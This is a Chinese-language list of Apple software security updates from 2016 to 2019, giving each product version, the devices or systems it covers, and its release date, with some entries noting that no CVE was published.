Safari 浏览器 13.0.1macOS Mojave 10.14.6 和 macOS High Sierra 10.13.62019 年 9 月 24 日
Apple TV 软件 7.4
这个更新没有已发布的 CVE 条目。
Apple TV(第 3 代)2019 年 9 月 24 日
Apple tvOS 13Apple TV 4K 和 Apple TV HD2019 年 9 月 24 日
Xcode 11.0macOS Mojave 10.14.4 及更高版本2019 年 9 月 20 日
watchOS 6Apple Watch Series 3 及更新机型
今年晚些时候,Apple Watch Series 1 和 2 也将支持 watchOS 6。
2019 年 9 月 19 日
Safari 浏览器 13macOS Mojave 10.14.6 和 macOS High Sierra 10.13.62019 年 9 月 19 日
iOS 13iPhone 6s 及更新机型2019 年 9 月 19 日
Windows 版 iTunes 12.10
这个更新没有已发布的 CVE 条目。
Windows 7 及更高版本2019 年 9 月 11 日
watchOS 5.3.1
这个更新没有已发布的 CVE 条目。
Apple Watch Series 1 及更新机型2019 年 8 月 26 日
iOS 12.4.1iPhone 5s 及更新机型、iPad Air 及更新机型、iPod touch 第 6 代及更新机型2019 年 8 月 26 日
macOS Mojave 10.14.6 补充更新macOS Mojave 10.14.62019 年 8 月 26 日
Apple tvOS 12.4.1Apple TV 4K 和 Apple TV HD2019 年 8 月 26 日
SwiftNIO HTTP/2 1.5.0macOS Sierra 10.12 及更高版本和 Ubuntu 14.04 及更高版本上的 SwiftNIO HTTP/2 1.0.0 至 1.4.02019 年 8 月 13 日
Windows 版 iCloud 10.6.1
这个更新没有已发布的 CVE 条目。
Windows 10 及更高版本,通过 Microsoft Store 获取2019 年 8 月 1 日
Windows 版 iCloud 10.6Windows 10 及更高版本,通过 Microsoft Store 获取2019 年 7 月 23 日
Windows 版 iCloud 7.13Windows 7 及更高版本2019 年 7 月 23 日
Windows 版 iTunes 12.9.6Windows 7 及更高版本2019 年 7 月 23 日
iOS 12.4iPhone 5s 及更新机型、iPad Air 及更新机型、iPod touch 第 6 代及更新机型2019 年 7 月 22 日
iOS 10.3.4
这个更新没有已发布的 CVE 条目。
iPhone 5、iPad(第 4 代)无线局域网 + 蜂窝网络2019 年 7 月 22 日
iOS 9.3.6
这个更新没有已发布的 CVE 条目。
iPhone 4s、iPad mini(第 1 代)无线局域网 + 蜂窝网络、iPad 2 无线局域网 + 蜂窝网络、iPad(第 3 代)无线局域网 + 蜂窝网络2019 年 7 月 22 日
Apple tvOS 12.4Apple TV 4K 和 Apple TV HD2019 年 7 月 22 日
Apple TV 软件 7.3.1
这个更新没有已发布的 CVE 条目。
Apple TV(第 3 代)2019 年 7 月 22 日
Safari 浏览器 12.1.2macOS Sierra 10.12.6、macOS High Sierra 10.13.6,随附于 macOS Mojave 10.14.6 中2019 年 7 月 22 日
macOS Mojave 10.14.6、安全性更新 2019-004 High Sierra、安全性更新 2019-004 SierramacOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.52019 年 7 月 22 日
watchOS 5.3Apple Watch Series 1 及更新机型2019 年 7 月 22 日
AirPort 基站固件更新 7.8.1AirPort Express、AirPort Extreme 和 AirPort 时间返回舱基站 (802.11n)2019 年 6 月 20 日
Windows 版 iCloud 10.4Windows 10(版本 18362.145)或更高版本2019 年 6 月 11 日
iOS 12.3.2
这个更新没有已发布的 CVE 条目。
iPhone 8 Plus2019 年 6 月 10 日
AirPort 基站固件更新 7.9.1AirPort Extreme 和 AirPort 时间返回舱基站 (802.11ac)2019 年 5 月 30 日
Windows 版 iTunes 12.9.5Windows 7 及更高版本2019 年 5 月 28 日
Windows 版 iCloud 7.12Windows 7 及更高版本2019 年 5 月 28 日
iOS 12.3.1
这个更新没有已发布的 CVE 条目。
iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2019 年 5 月 24 日
watchOS 5.2.1Apple Watch Series 1 及更新机型2019 年 5 月 13 日
Safari 浏览器 12.1.1macOS Sierra 10.12.6、macOS High Sierra 10.13.6,随附于 macOS Mojave 10.14.5 中2019 年 5 月 13 日
Apple TV 软件 7.3Apple TV(第 3 代)2019 年 5 月 13 日
Apple tvOS 12.3Apple TV 4K 和 Apple TV HD2019 年 5 月 13 日
iOS 12.3iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2019 年 5 月 13 日
macOS Mojave 10.14.5、安全性更新 2019-003 High Sierra、安全性更新 2019-003 SierramacOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.42019 年 5 月 13 日
安卓版 Texture 4.22.0.4安卓版本 4.1 及更高版本2019 年 4 月 11 日
iOS 版 Texture 5.11.10iOS 9.0 及更高版本2019 年 4 月 11 日
Apple tvOS 12.2.1
这个更新没有已发布的 CVE 条目。
Apple TV 4K 和 Apple TV HD2019 年 4 月 10 日
安全性更新 2019-002 High Sierra 和安全性更新 2019-002 SierramacOS Sierra 10.12.6 和 macOS High Sierra 10.13.62019 年 3 月 29 日
watchOS 5.2Apple Watch Series 1 及更新机型2019 年 3 月 27 日
安卓版 Shazam App 版本 9.25.0安卓:9.24.12019 年 3 月 26 日
iOS 版 Shazam App 版本 12.11.0iOS 10 及更高版本2019 年 3 月 26 日
Windows 版 iCloud 7.11Windows 7 及更高版本2019 年 3 月 25 日
Windows 版 iTunes 12.9.4Windows 7 及更高版本2019 年 3 月 25 日
Safari 浏览器 12.1macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.42019 年 3 月 25 日
macOS Mojave 10.14.4、安全性更新 2019-002 High Sierra、安全性更新 2019-002 SierramacOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.32019 年 3 月 25 日
Apple tvOS 12.2Apple TV 4K 和 Apple TV HD(即以前的 Apple TV(第 4 代))2019 年 3 月 25 日
Xcode 10.2macOS High Sierra 10.13.6 及更高版本2019 年 3 月 25 日
iOS 12.2iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2019 年 3 月 25 日
iOS 版快捷指令 2.1.3iOS 版快捷指令 2.1.22019 年 2 月 7 日
macOS Mojave 10.14.3 补充更新macOS Mojave 10.14.32019 年 2 月 7 日
iOS 12.1.4iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2019 年 2 月 7 日
Windows 版 iTunes 12.9.3Windows 7 及更高版本2019 年 1 月 24 日
Windows 版 iCloud 7.10Windows 7 及更高版本2019 年 1 月 22 日
Safari 浏览器 12.0.3macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.32019 年 1 月 22 日
watchOS 5.1.3Apple Watch Series 1 及更新机型2019 年 1 月 22 日
Apple tvOS 12.1.2Apple TV 4K 和 Apple TV(第 4 代)2019 年 1 月 22 日
macOS Mojave 10.14.3、安全性更新 2019-001 High Sierra、安全性更新 2019-001 SierramacOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.22019 年 1 月 22 日
iOS 12.1.3iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2019 年 1 月 22 日
iOS 12.1.2
这个更新没有已发布的 CVE 条目。
iPhone 5s 及更新机型2018 年 12 月 17 日
watchOS 5.1.2Apple Watch Series 1 及更新机型2018 年 12 月 6 日
Windows 版 iCloud 7.9Windows 7 及更高版本2018 年 12 月 5 日
Safari 浏览器 12.0.2macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.12018 年 12 月 5 日
Windows 版 iTunes 12.9.2Windows 7 及更高版本2018 年 12 月 5 日
macOS Mojave 10.14.2、安全性更新 2018-003 High Sierra、安全性更新 2018-006 SierramacOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.12018 年 12 月 5 日
iOS 版快捷指令 2.1.2iOS 12.0 及更高版本2018 年 12 月 5 日
Apple tvOS 12.1.1Apple TV 4K 和 Apple TV(第 4 代)2018 年 12 月 5 日
iOS 12.1.1iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 12 月 5 日
Windows 版 iCloud 7.8.1
这个更新没有已发布的 CVE 条目。
Windows 7 及更高版本2018 年 11 月 27 日
适用于 MacBook Air(2018 年)的 macOS Mojave 10.14.1 补充更新
这个更新没有已发布的 CVE 条目。
MacBook Air(2018 年)2018 年 11 月 7 日
watchOS 5.1.1
这个更新没有已发布的 CVE 条目。
Apple Watch Series 1 及更新机型2018 年 11 月 5 日
Safari 浏览器 12.0.1macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.142018 年 10 月 30 日
Windows 版 iCloud 7.8Windows 7 及更高版本2018 年 10 月 30 日
Windows 版 iTunes 12.9.1Windows 7 及更高版本2018 年 10 月 30 日
watchOS 5.1Apple Watch Series 1 及更新机型2018 年 10 月 30 日
iOS 12.1iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 10 月 30 日
Apple tvOS 12.1Apple TV 4K 和 Apple TV(第 4 代)2018 年 10 月 30 日
macOS Mojave 10.14.1、安全性更新 2018-002 High Sierra、安全性更新 2018-005 SierramacOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.142018 年 10 月 30 日
Windows 版 iCloud 7.7Windows 7 及更高版本2018 年 10 月 8 日
iOS 12.0.1iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 10 月 8 日
watchOS 5.0.1
这个更新没有已发布的 CVE 条目。
Apple Watch Series 1 及更新机型2018 年 9 月 27 日
macOS Mojave 10.14MacBook(2015 年初及更新机型)、MacBook Air(2012 年中及更新机型)、MacBook Pro(2012 年中及更新机型)、Mac mini(2012 年末及更新机型)、iMac(2012 年末及更新机型)、iMac Pro(所有机型)、Mac Pro(2013 年末、2010 年中和 2012 年中机型,且配备兼容 Metal 的推荐图形处理器,包括 MSI Gaming Radeon RX 560 和 Sapphire Radeon PULSE RX 580)2018 年 9 月 24 日
Xcode 10macOS High Sierra 10.13.6 或更高版本2018 年 9 月 17 日
iOS 版 Apple 支持 2.4iOS 11.0 及更高版本2018 年 9 月 17 日
Safari 浏览器 12macOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.142018 年 9 月 17 日
watchOS 5Apple Watch Series 1 及更新机型2018 年 9 月 17 日
Apple tvOS 12Apple TV 4K 和 Apple TV(第 4 代)2018 年 9 月 17 日
iOS 12iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 9 月 17 日
Windows 版 iTunes 12.9Windows 7 及更高版本2018 年 9 月 12 日
适用于 MacBook Pro(2018 年)的 macOS High Sierra 10.13.6 补充更新 2配备触控栏的 MacBook Pro(2018 年)2018 年 8 月 28 日
Windows 版 iTunes 12.8Windows 7 及更高版本2018 年 7 月 9 日
Windows 版 iCloud 7.6Windows 7 及更高版本2018 年 7 月 9 日
Safari 浏览器 11.1.2OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.62018 年 7 月 9 日
macOS High Sierra 10.13.6、安全性更新 2018-004 Sierra、安全性更新 2018-004 El CapitanOS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.52018 年 7 月 9 日
watchOS 4.3.2所有 Apple Watch 机型2018 年 7 月 9 日
Apple tvOS 11.4.1Apple TV 4K 和 Apple TV(第 4 代)2018 年 7 月 9 日
iOS 11.4.1iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 7 月 9 日
启动转换 6.4.0 的 Wi-Fi 更新MacBook(2009 年末及更新机型)、MacBook Pro(2010 年中及更新机型)、MacBook Air(2010 年末及更新机型)、Mac mini(2010 年中及更新机型)、iMac(2009 年末及更新机型)和 Mac Pro(2010 年中及更新机型)2018 年 7 月 5 日
SwiftNIO 1.8.0macOS Sierra 10.12 及更高版本、Ubuntu 14.04 及更高版本2018 年 6 月 27 日
Xcode 9.4.1macOS High Sierra 10.13.2 或更高版本2018 年 6 月 13 日
Windows 版 iCloud 7.5Windows 7 及更高版本2018 年 6 月 1 日
Safari 浏览器 11.1.1OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.42018 年 6 月 1 日
macOS High Sierra 10.13.5、安全性更新 2018-003 Sierra、安全性更新 2018-003 El CapitanOS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.42018 年 6 月 1 日
iOS 11.4iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 5 月 29 日
watchOS 4.3.1所有 Apple Watch 机型2018 年 5 月 29 日
Windows 版 iTunes 12.7.5Windows 7 及更高版本2018 年 5 月 29 日
Apple tvOS 11.4Apple TV 4K 和 Apple TV(第 4 代)2018 年 5 月 29 日
适用于 Ubuntu 14.04 的安全性更新 2018-001 Swift 4.1.1Ubuntu 14.042018 年 5 月 4 日
Safari 浏览器 11.1
(版本 11605.1.33.1.4、12605.1.33.1.4 和 13605.1.33.1.4)
OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.42018 年 4 月 24 日
安全性更新 2018-001macOS High Sierra 10.13.42018 年 4 月 24 日
iOS 11.3.1iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 4 月 24 日
Windows 版 iCloud 7.4Windows 7 及更高版本2018 年 3 月 29 日
Safari 浏览器 11.1OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.42018 年 3 月 29 日
macOS High Sierra 10.13.4、安全性更新 2018-002 Sierra 和安全性更新 2018-002 El CapitanOS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.32018 年 3 月 29 日
Windows 版 iTunes 12.7.4Windows 7 及更高版本2018 年 3 月 29 日
Xcode 9.3macOS High Sierra 10.13.2 或更高版本2018 年 3 月 29 日
Apple tvOS 11.3Apple TV 4K 和 Apple TV(第 4 代)2018 年 3 月 29 日
watchOS 4.3所有 Apple Watch 机型2018 年 3 月 29 日
iOS 11.3iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 3 月 29 日
Apple tvOS 11.2.6Apple TV 4K 和 Apple TV(第 4 代)2018 年 2 月 19 日
watchOS 4.2.3所有 Apple Watch 机型2018 年 2 月 19 日
iOS 11.2.6iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 2 月 19 日
macOS High Sierra 10.13.3 补充更新macOS High Sierra 10.13.32018 年 2 月 19 日
Windows 版 iTunes 12.7.3Windows 7 及更高版本2018 年 1 月 23 日
Windows 版 iCloud 7.3Windows 7 及更高版本2018 年 1 月 23 日
Safari 浏览器 11.0.3OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.32018 年 1 月 23 日
watchOS 4.2.2所有 Apple Watch 机型2018 年 1 月 23 日
iOS 11.2.5iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 1 月 23 日
macOS High Sierra 10.13.3、安全性更新 2018-001 Sierra 和安全性更新 2018-001 El CapitanmacOS High Sierra 10.13.2、macOS Sierra 10.12.6 和 OS X El Capitan 10.11.62018 年 1 月 23 日
Apple tvOS 11.2.5Apple TV 4K 和 Apple TV(第 4 代)2018 年 1 月 23 日
macOS High Sierra 10.13.2 补充更新macOS High Sierra 10.13.22018 年 1 月 8 日
Safari 浏览器 11.0.2
(版本 11604.4.7.1.6 和 2604.4.7.1.6)
OS X El Capitan 10.11.6 和 macOS Sierra 10.12.62018 年 1 月 8 日
iOS 11.2.2iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2018 年 1 月 8 日
Windows 版 iCloud 7.2Windows 7 及更高版本2017 年 12 月 13 日
Apple tvOS 11.2.1Apple TV 4K 和 Apple TV(第 4 代)2017 年 12 月 13 日
iOS 11.2.1iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2017 年 12 月 13 日
AirPort 基站固件更新 7.7.9AirPort Extreme 和 AirPort 时间返回舱基站 (802.11ac)2017 年 12 月 12 日
AirPort 基站固件更新 7.6.9AirPort Express、AirPort Extreme 和 AirPort 时间返回舱基站 (802.11n)2017 年 12 月 12 日
Windows 版 iTunes 12.7.2Windows 7 及更高版本2017 年 12 月 6 日
macOS High Sierra 10.13.2、安全性更新 2017-002 Sierra 和安全性更新 2017-005 El CapitanOS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.13.12017 年 12 月 6 日
Safari 浏览器 11.0.2OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.132017 年 12 月 6 日
watchOS 4.2所有 Apple Watch 机型2017 年 12 月 5 日
Xcode 9.2macOS Sierra 10.12.6 或更高版本2017 年 12 月 4 日
Apple tvOS 11.2Apple TV 4K 和 Apple TV(第 4 代)2017 年 12 月 4 日
iOS 11.2iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2017 年 12 月 2 日
安全性更新 2017-001macOS High Sierra 10.13 和 macOS High Sierra 10.13.12017 年 11 月 29 日
iOS 11.1.2iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2017 年 11 月 16 日
iOS 11.1.1iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2017 年 11 月 9 日
Windows 版 iCloud 7.1Windows 7 及更高版本2017 年 10 月 31 日
Windows 版 iTunes 12.7.1Windows 7 及更高版本2017 年 10 月 31 日
Safari 浏览器 11.0.1OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.132017 年 10 月 31 日
Apple tvOS 11.1Apple TV 4K 和 Apple TV(第 4 代)2017 年 10 月 31 日
macOS High Sierra 10.13.1、安全性更新 2017-001 Sierra 和安全性更新 2017-004 El CapitanOS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.132017 年 10 月 31 日
iOS 11.1iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2017 年 10 月 31 日
watchOS 4.1所有 Apple Watch 机型2017 年 10 月 31 日
iOS 11.0.3iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2017 年 10 月 11 日
macOS High Sierra 10.13 补充更新macOS High Sierra 10.132017 年 10 月 5 日
watchOS 4.0.1Apple Watch Series 3(GPS + 蜂窝网络)2017 年 10 月 4 日
iOS 11.0.2iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2017 年 10 月 3 日
iOS 11.0.1iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2017 年 9 月 26 日
macOS 服务器 5.4macOS High Sierra 10.132017 年 9 月 25 日
Windows 版 iCloud 7.0Windows 7 及更高版本2017 年 9 月 25 日
macOS High Sierra 10.13OS X Mountain Lion 10.8 及更高版本2017 年 9 月 25 日
Xcode 9macOS Sierra 10.12.6 或更高版本2017 年 9 月 19 日
Apple tvOS 11Apple TV(第 4 代)2017 年 9 月 19 日
watchOS 4所有 Apple Watch 机型2017 年 9 月 19 日
Safari 浏览器 11OS X El Capitan 10.11.6、macOS Sierra 10.12.6 和 macOS High Sierra 10.132017 年 9 月 19 日
iOS 11iPhone 5s 及更新机型、iPad Air 及更新机型和 iPod touch 第 6 代2017 年 9 月 19 日
iTunes 12.7OS X Yosemite 10.10.5 及更高版本2017 年 9 月 12 日
Windows 版 iTunes 12.7Windows 7 及更高版本2017 年 9 月 12 日
iOS 版 Apple 支持 1.2iOS 9.0 及更高版本2017 年 8 月 30 日
启动转换 6.1 的 Wi-Fi 更新运行“启动转换”时的 MacBook Air(2010 年末及更新机型)、MacBook Pro(2010 年末及更新机型)、Mac mini(2010 年中及更新机型)、iMac(2010 年中及更新机型)和 MacBook(2010 年中及更新机型)2017 年 7 月 19 日
Apple tvOS 10.2.2Apple TV(第 4 代)2017 年 7 月 19 日
Windows 版 iTunes 12.6.2Windows 7 及更高版本2017 年 7 月 19 日
Windows 版 iCloud 6.2.2Windows 7 及更高版本2017 年 7 月 19 日
Safari 浏览器 10.1.2OS X Yosemite 10.10.5、OS X El Capitan 10.11.6 和 macOS Sierra 10.12.62017 年 7 月 19 日
macOS Sierra 10.12.6、安全性更新 2017-003 El Capitan 和安全性更新 2017-003 YosemitemacOS Sierra 10.12.5、OS X El Capitan 10.11.6 和 OS X Yosemite 10.10.52017 年 7 月 19 日
iOS 10.3.3iPhone 5 及更新机型、iPad 第 4 代及更新机型和 iPod touch 第 6 代2017 年 7 月 19 日
watchOS 3.2.3所有 Apple Watch 机型2017 年 7 月 19 日
Apple tvOS 10.2.1Apple TV(第 4 代)2017 年 5 月 15 日
Windows 版 iCloud 6.2.1Windows 7 及更高版本2017 年 5 月 15 日
Safari 浏览器 10.1.1OS X Yosemite 10.10.5、OS X El Capitan 10.11.6 和 macOS Sierra 10.12.52017 年 5 月 15 日
Windows 版 iTunes 12.6.1Windows 7 及更高版本2017 年 5 月 15 日
watchOS 3.2.2所有 Apple Watch 机型2017 年 5 月 15 日
macOS Sierra 10.12.5、安全性更新 2017-002 El Capitan 和安全性更新 2017-002 YosemitemacOS Sierra 10.12.4、OS X El Capitan 10.11.6 和 OS X Yosemite 10.10.52017 年 5 月 15 日
iOS 10.3.2iPhone 5 及更新机型、iPad 第 4 代及更新机型和 iPod touch 第 6 代2017 年 5 月 15 日
安卓版 Apple Music 2.0安卓版本 4.3 及更高版本2017 年 4 月 4 日
iOS 10.3.1iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型2017 年 4 月 3 日
Windows 版 iCloud 6.2Windows 7 及更高版本2017 年 3 月 28 日
macOS 服务器 5.3macOS 10.12.4 及更高版本2017 年 3 月 27 日
Apple tvOS 10.2Apple TV(第 4 代)2017 年 3 月 27 日
watchOS 3.2所有 Apple Watch 机型2017 年 3 月 27 日
iOS 10.3iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型2017 年 3 月 27 日
macOS Sierra 10.12.4、安全性更新 2017-001 El Capitan 和安全性更新 2017-001 YosemitemacOS Sierra 10.12.3、OS X El Capitan v10.11.6 和 OS X Yosemite v10.10.52017 年 3 月 27 日
Safari 浏览器 10.1OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12.42017 年 3 月 27 日
Mac 版 Pages 文稿 6.1、Numbers 表格 4.1 和 Keynote 讲演 7.1 以及 iOS 版 Pages 文稿 3.1、Numbers 表格 3.1 和 Keynote 讲演 3.1macOS 10.12 及更高版本、iOS 10.0 及更高版本2017 年 3 月 27 日
Windows 版 iTunes 12.6Windows 7 及更高版本2017 年 3 月 21 日
iTunes 12.6OS X Mavericks v10.9.5 及更高版本2017 年 3 月 21 日
Apple 远程桌面 3.9OS X Yosemite v10.10.5 及更高版本2017 年 2 月 21 日
Logic Pro X 10.3.1OS X El Capitan v10.11 及更高版本(64 位)2017 年 2 月 21 日
库乐队 10.1.6OS X Yosemite v10.10 及更高版本2017 年 2 月 13 日
Windows 版 iTunes 12.5.5Windows 7 及更高版本2017 年 1 月 23 日
Safari 浏览器 10.0.3OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12.32017 年 1 月 23 日
Windows 版 iCloud 6.1.1Windows 7 及更高版本2017 年 1 月 23 日
macOS Sierra 10.12.3macOS Sierra 10.12.22017 年 1 月 23 日
iOS 10.2.1iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型2017 年 1 月 23 日
Apple tvOS 10.1.1Apple TV(第 4 代)2017 年 1 月 23 日
watchOS 3.1.3所有 Apple Watch 机型2017 年 1 月 23 日
库乐队 10.1.5OS X Yosemite v10.10 及更高版本2017 年 1 月 18 日
Logic Pro X 10.3OS X El Capitan v10.11 及更高版本(64 位)2017 年 1 月 18 日
Windows 版 iCloud 6.1Windows 7 及更高版本2016 年 12 月 13 日
Safari 浏览器 10.0.2OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12.22016 年 12 月 13 日
Windows 版 iTunes 12.5.4Windows 7 及更高版本2016 年 12 月 13 日
macOS Sierra 10.12.2、安全性更新 2016-003 El Capitan 和安全性更新 2016-007 YosemiteOS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.12.12016 年 12 月 13 日
Apple tvOS 10.1Apple TV(第 4 代)2016 年 12 月 12 日
iOS 10.2iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型2016 年 12 月 12 日
Transporter 1.9.2iTunes Producer 3.1.1、OS X v10.6 及更高版本(64 位)、Windows 7 及更高版本(32 位)和 Red Hat Enterprise Linux(64 位)2016 年 12 月 5 日
iOS 10.1.1iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型2016 年 10 月 31 日
Windows 版 iTunes 12.5.2Windows 7 及更高版本2016 年 10 月 27 日
Windows 版 iCloud 6.0.1Windows 7 及更高版本2016 年 10 月 27 日
Xcode 8.1OS X El Capitan v10.11.5 及更高版本2016 年 10 月 27 日
watchOS 3.1所有 Apple Watch 机型2016 年 10 月 24 日
Apple tvOS 10.0.1Apple TV(第 4 代)2016 年 10 月 24 日
Safari 浏览器 10.0.1OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.122016 年 10 月 24 日
macOS Sierra 10.12.1、安全性更新 2016-002 El Capitan 和安全性更新 2016-006 YosemiteOS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.122016 年 10 月 24 日
iOS 10.1iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型2016 年 10 月 24 日
iOS 10.0.3iPhone 7 和 iPhone 7 Plus2016 年 10 月 17 日
iOS 10.0.2iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型2016 年 9 月 23 日
Mac 版 Pages 文稿 6.0、Numbers 表格 4.0 和 Keynote 讲演 7.0macOS 10.12 及更高版本2016 年 9 月 20 日
Windows 版 iCloud 6.0Windows 7 及更高版本2016 年 9 月 20 日
macOS 服务器 5.2macOS Sierra 10.122016 年 9 月 20 日
Safari 浏览器 10OS X Yosemite v10.10.5、OS X El Capitan v10.11.6 和 macOS Sierra 10.122016 年 9 月 20 日
macOS Sierra 10.12OS X Lion v10.7.5 及更高版本2016 年 9 月 20 日
iOS 版 Pages 文稿 3.0、Numbers 表格 3.0 和 Keynote 讲演 3.0iOS 10.0 及更高版本2016 年 9 月 13 日
Windows 版 iTunes 12.5.1Windows 7 及更高版本2016 年 9 月 13 日
Apple tvOS 10Apple TV(第 4 代)2016 年 9 月 13 日
watchOS 3所有 Apple Watch 机型2016 年 9 月 13 日
Xcode 8OS X El Capitan v10.11.5 及更高版本2016 年 9 月 13 日
iOS 10.0.1iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型2016 年 9 月 13 日
iOS 10iPhone 5 及更新机型、iPad 第 4 代及更新机型、iPod touch 第 6 代及更新机型2016 年 9 月 13 日
安全性更新 2016-001 El Capitan 和安全性更新 2016-005 YosemiteOS X Yosemite v10.10.5 和 OS X El Capitan v10.11.62016 年 9 月 1 日
Safari 浏览器 9.1.3OS X Mavericks v10.9.5 和 OS X Yosemite v10.10.52016 年 9 月 1 日
iOS 9.3.5iPhone 4s 及更新机型、iPad 2 及更新机型、iPod touch(第 5 代)及更新机型2016 年 8 月 25 日
iOS 9.3.4iPhone 4s 及更新机型、iPad 2 及更新机型、iPod touch(第 5 代)及更新机型2016 年 8 月 4 日
Windows 版 iCloud 5.2.1Windows 7 及更高版本2016 年 7 月 18 日
Windows 版 iTunes 12.4.2Windows 7 及更高版本2016 年 7 月 18 日
Safari 浏览器 9.1.2OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11.62016 年 7 月 18 日
Apple tvOS 9.2.2Apple TV(第 4 代)2016 年 7 月 18 日
watchOS 2.2.2Apple Watch Sport、Apple Watch、Apple Watch Edition 和 Apple Watch Hermès2016 年 7 月 18 日
iOS 9.3.3iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型2016 年 7 月 18 日
OS X El Capitan v10.11.6 和安全性更新 2016-004OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11 及更高版本2016 年 7 月 18 日
AirPort 基站固件更新 7.6.7 和 7.7.7AirPort Express、AirPort Extreme 和 AirPort 时间返回舱基站 (802.11n);AirPort Extreme 和 AirPort 时间返回舱基站 (802.11ac)2016 年 6 月 20 日
iTunes 12.4Windows 7 及更高版本2016 年 5 月 16 日
Safari 浏览器 9.1.1OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11.52016 年 5 月 16 日
OS X El Capitan v10.11.5 和安全性更新 2016-003OS X El Capitan v10.11 及更高版本2016 年 5 月 16 日
watchOS 2.2.1Apple Watch Sport、Apple Watch、Apple Watch Edition 和 Apple Watch Hermès2016 年 5 月 16 日
iOS 9.3.2iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型2016 年 5 月 16 日
Apple tvOS 9.2.1Apple TV(第 4 代)2016 年 5 月 16 日
Xcode 7.3.1OS X El Capitan v10.11 及更高版本2016 年 5 月 3 日
iOS 9.3.1iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型2016 年 3 月 31 日
iBooks Author 2.4.1OS X Yosemite v10.10 及更高版本2016 年 3 月 29 日
OS X 服务器 5.1OS X El Capitan v10.11.42016 年 3 月 21 日
